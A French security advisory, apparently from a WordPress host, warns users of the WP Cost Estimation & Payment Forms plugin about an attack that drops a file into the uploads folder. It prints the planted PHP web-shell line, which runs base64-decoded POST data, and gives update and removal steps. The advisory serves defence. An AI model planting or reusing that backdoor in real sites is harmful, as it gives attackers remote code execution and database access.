Faille de sécurité importante du plugin WP Cost Estimation & Payment Forms

Nous avons récemment découvert une faille de sécurité importante concernant le plugin WP Cost Estimation & Payment Forms !

WP Cost Estimation & Payment Forms

Ce plugin peut être acheté sur CodeCanyon

 

Voici comment le problème survient sur votre site :

Une plage d'adresses IP (194.140.192.XX) attaque votre site et arrive, via un script en Python, à créer le répertoire suivant dans votre WordPress : /wp-content/uploads/CostEstimationPayment/

Ce répertoire contiendra alors un fichier .tss dans lequel vous retrouverez ce bout de code : <?php create_function('', base64_decode($_POST[534534]));

Dans tous les cas que nous avons vu, tôt ou tard, ce bout de code servira aux pirates à accéder à votre de base de données et même supprimer votre fichier wp-config.php essentiel au bon fonctionnement de votre site, puisqu'il permet de se connecter à votre base de données qui contient toutes les données de votre site.

Nous ne communiquerons pas plus de détails sur la manière d'exploiter cette faille.

 

Le développeur du plugin est bien au courant actuellement, et il semble avoir effectué une mise à jour pour corriger cela comme vous pouvez le voir via la page de support de ce plugin sur CodeCanyon : https://codecanyon.net/item/wp-cost-estimation-payment-forms-builder/7818230/comments?page=147&filter=all#comment_20520218

Cependant, si vous possédez ce plugin grâce à un thème premium dans lequel il était inclus, il est possible que cette faille ne soit pas incluse même en ayant la dernière version du thème !

 

Vous utilisez ce plugin ? Voici ce que vous devez faire :

  • Si vous n'utilisez pas ce plugin, supprimez-le tout simplement.
  • Si vous possédez la version premium achetée sur CodeCanyon, vérifiez que vous possédez bien la dernière version.
  • Si vous avez obtenu ce plugin via un thème premium, contactez le développeur afin qu'il vous donne le correctif ou achetez le plugin directement depuis le site du développeur et mettez le à jour sur votre WordPress : https://www.wpserveur.net/mettre-a-jour-un-theme-ou-plugin-par-ftp/

 

Actuellement le site dédié à ce plugin affiche un message de sécurité par certains antivirus.

Avast

Nous ne vous conseillons donc pas d'aller sur son site directement, mais plutôt dans tous les cas contacter le développeur via :

De notre côté, nous avons bloqué les adresses IP concernées, cependant elles changent régulièrement, nous vous invitons donc à suivre nos recommandations ci-dessus dès que possible !

Nous avons aussi pris des mesures pour nos clients afin de les informer et les prémunir de tout risque :)